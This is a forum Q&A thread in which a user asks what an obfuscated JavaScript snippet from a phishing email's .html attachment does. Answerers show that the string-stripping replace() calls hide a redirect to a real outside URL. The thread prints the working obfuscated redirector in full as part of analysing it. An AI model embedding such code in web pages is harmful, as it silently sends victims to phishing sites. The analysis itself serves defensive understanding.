What does this suspicious phishing code do?

A few of my non-IT coworkers opened a .html attachment in an email message that looks extremely suspicious. It resulted in a blank screen when it appears that some javascript code was run.

<script type='text/javascript'>function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];this.nH=false;eX=2280;dF="dF";var hN=function(){return 'hN'};this.g=6633;var a='';dK="";function x(b){var aF=new Array();this.q='';var hKB=false;var uN="";b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;this.qO=15083;uR='';var hB=new Date();s="s";}var dI=46541;gN=55114;this.c="c";nT="";this.bG=false;var m=new Date();var fJ=49510;x(t);this.y="";bL='';var k=new Date();var mE=function(){};}};var l=22739;var tL=new uK(); var p="";tL.f();this.kY=false;</script>

What did it do? It's beyond the scope of my programming knowledge.
It will redirect to a url, 'http://lendermedia.com/images/z.htm' (follow it at your own risk).

Copy and paste the code into a worthy JavaScript editor and have it format the source for you.

Key points:
- h will equal 'http://lendermedia.com/images/z.htm'
- t will contain a reference to document.location
- The property named href of b, which at this point (inside another function) really is t from the above statement, is set to h, which is the url.

Most of the code is mere noise, the actual functionality consists of this:
I encountered the same issue, and then found this page. After doing a WHOIS for the contact info, I contacted the owner of lendermedia.com, who appeared to have just found out that his site is hosting the z.htm page w/out his knowledge and against his wishes. At the time I contacted him I was able to browse his /images/ directory. He has since changed the permissions. All this to say that it appears this guy is clean, but that's for you to decide.

Minus the obfuscation, it does something like
document.location.href="http://lendermedia.com/images/z.htm"
Key part to understand that code is the
replace(/[\^H\!9X]/g, '')
parts. If the 2nd argument for the replace is '', then it's merely removing stuff from the previous string. Really inelegant way to obfuscate things. Probably the aim is just to be random for each user and avoid Bayesian spam filters.